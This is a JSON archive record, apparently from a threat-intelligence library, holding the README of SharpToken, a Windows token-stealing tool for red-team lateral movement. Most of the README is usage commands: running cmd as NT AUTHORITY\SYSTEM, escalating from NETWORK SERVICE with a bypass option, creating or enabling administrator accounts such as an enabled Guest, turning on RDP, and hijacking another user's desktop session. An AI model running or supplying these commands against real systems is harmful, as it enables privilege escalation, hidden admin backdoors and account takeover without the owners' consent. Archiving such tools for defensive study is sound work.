{
	"id": "f16c1632-b2d6-470b-b419-2356a0f69800",
	"created_at": "2026-04-06T00:11:25.827725Z",
	"updated_at": "2026-04-10T13:11:23.225961Z",
	"deleted_at": null,
	"sha1_hash": "b2696b62ba9240d54c455d044f1e218d7d61a401",
	"title": "GitHub - BeichenDream/SharpToken: Windows Token Stealing Expert",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 931897,
	"plain_text": "GitHub - BeichenDream/SharpToken: Windows Token Stealing\r\nExpert\r\nBy BeichenDream\r\nArchived: 2026-04-05 21:39:03 UTC\r\nDuring red team lateral movement, we often need to steal the permissions of other users. Under the defense of\r\nmodern EDR, it is difficult for us to use Mimikatz to obtain other user permissions, and if the target user has no\r\nprocess alive, we have no way to use \"OpenProcessToken\" to steal Token.\r\nSharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use\r\nthem. If you are a low-privileged service user, you can even use it to upgrade to \"NT AUTHORITY\\SYSTEM\"\r\nprivileges, and you can switch to the target user's desktop to do more without the target user's password. ..\r\nUsage\r\nSharpToken By BeichenDream\r\n=========================================================\r\nGithub : https://github.com/BeichenDream/SharpToken\r\nhttps://github.com/BeichenDream/SharpToken\r\nPage 1 of 7\n\nIf you are an NT AUTHORITY\\NETWORK SERVICE user then you just need to add the bypass parameter to become an NT A\r\ne.g.\r\nSharpToken execute \"NT AUTHORITY\\SYSTEM\" \"cmd /c whoami\" bypass\r\nUsage:\r\nSharpToken COMMAND arguments\r\nCOMMANDS:\r\n list_token [process pid] [bypass]\r\n list_all_token [process pid] [bypass]\r\n add_user \u003cusername\u003e \u003cpassword\u003e [group] [domain] [bypass]\r\n enableUser \u003cusername\u003e \u003cNewPassword\u003e [NewGroup] [bypass]\r\n delete_user \u003cusername\u003e [domain] [bypass]\r\n execute \u003ctokenUser\u003e \u003ccommandLine\u003e [Interactive] [bypass]\r\n enableRDP [bypass]\r\n tscon \u003ctargetSessionId\u003e [sourceSessionId] [bypass]\r\nexample:\r\n SharpToken list_token\r\n SharpToken list_token bypass\r\n SharpToken list_token 6543\r\n SharpToken add_user admin Abcd1234! Administrators\r\n SharpToken enableUser Guest Abcd1234! Administrators\r\n SharpToken delete_user admin\r\n SharpToken execute \"NT AUTHORITY\\SYSTEM\" \"cmd /c whoami\"\r\n SharpToken execute \"NT AUTHORITY\\SYSTEM\" \"cmd /c whoami\" bypass\r\n SharpToken execute \"NT AUTHORITY\\SYSTEM\" cmd true\r\n SharpToken execute \"NT AUTHORITY\\SYSTEM\" cmd true bypass\r\n SharpToken tscon 1\r\nhttps://github.com/BeichenDream/SharpToken\r\nPage 2 of 7\n\nElevated Permissions\r\nIn addition to the usual Token stealing privilege enhancement, SharpToken also supports obtaining Tokens with\r\nintegrity through Bypass\r\nIf you are an NT AUTHORITY/NETWORK SERVICE user and you add the bypass parameter, SharpToken will\r\nsteal System from RPCSS, that is, unconditional NT AUTHORITY\\NETWORK SERVICE to NT\r\nAUTHORITY\\SYSTEM\r\nListToken\r\nEnumerated information includes SID, LogonDomain, UserName, Session, LogonType, TokenType, TokenHandle\r\n(handle of Token after Duplicate), TargetProcessId (process from which Token originates), TargetProcessToken\r\n(handle of Token in source process), Groups (group in which Token user is located)\r\nSharpToken list_token\r\nhttps://github.com/BeichenDream/SharpToken\r\nPage 3 of 7\n\nEnumerate Tokens from the specified process\r\nSharpToken list_token 468\r\nhttps://github.com/BeichenDream/SharpToken\r\nPage 4 of 7\n\nGet an interactive shell\r\nexecute \"NT AUTHORITY\\SYSTEM\" cmd true\r\nhttps://github.com/BeichenDream/SharpToken\r\nPage 5 of 7\n\nGet command execution results (executed under webshell)\r\nSharpToken execute \"NT AUTHORITY\\SYSTEM\" \"cmd /c whoami\"\r\nCreate an admin user with the stolen token\r\nSharpToken add_user admin Abcd1234! Administrators\r\nEnable an admin user with the stolen token\r\n SharpToken enableUser Guest Abcd1234! Administrators\r\nDelete a user with a stolen Token\r\n SharpToken delete_user admin\r\nUse the stolen Token to switch to the target's desktop\r\nWhere 1 is the target user's desktop and 2 is the desktop we want to receive\r\n SharpToken tscon 1 2\r\nhttps://github.com/BeichenDream/SharpToken\r\nPage 6 of 7\n\nLICENSE\r\nGNU General Public License\r\nReference\r\nhttps://www.tiraniddo.dev/2020/04/sharing-logon-session-little-too-much.html\r\nhttps://github.com/decoder-it/NetworkServiceExploit\r\nhttps://github.com/FSecureLABS/incognito\r\nhttps://github.com/chroblert/JCTokenUtil\r\nSource: https://github.com/BeichenDream/SharpToken\r\nhttps://github.com/BeichenDream/SharpToken\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://github.com/BeichenDream/SharpToken"
	],
	"report_names": [
		"SharpToken"
	],
	"threat_actors": [],
	"ts_created_at": 1775434285,
	"ts_updated_at": 1775826683,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b2696b62ba9240d54c455d044f1e218d7d61a401.pdf",
		"text": "https://archive.orkl.eu/b2696b62ba9240d54c455d044f1e218d7d61a401.txt",
		"img": "https://archive.orkl.eu/b2696b62ba9240d54c455d044f1e218d7d61a401.jpg"
	}
}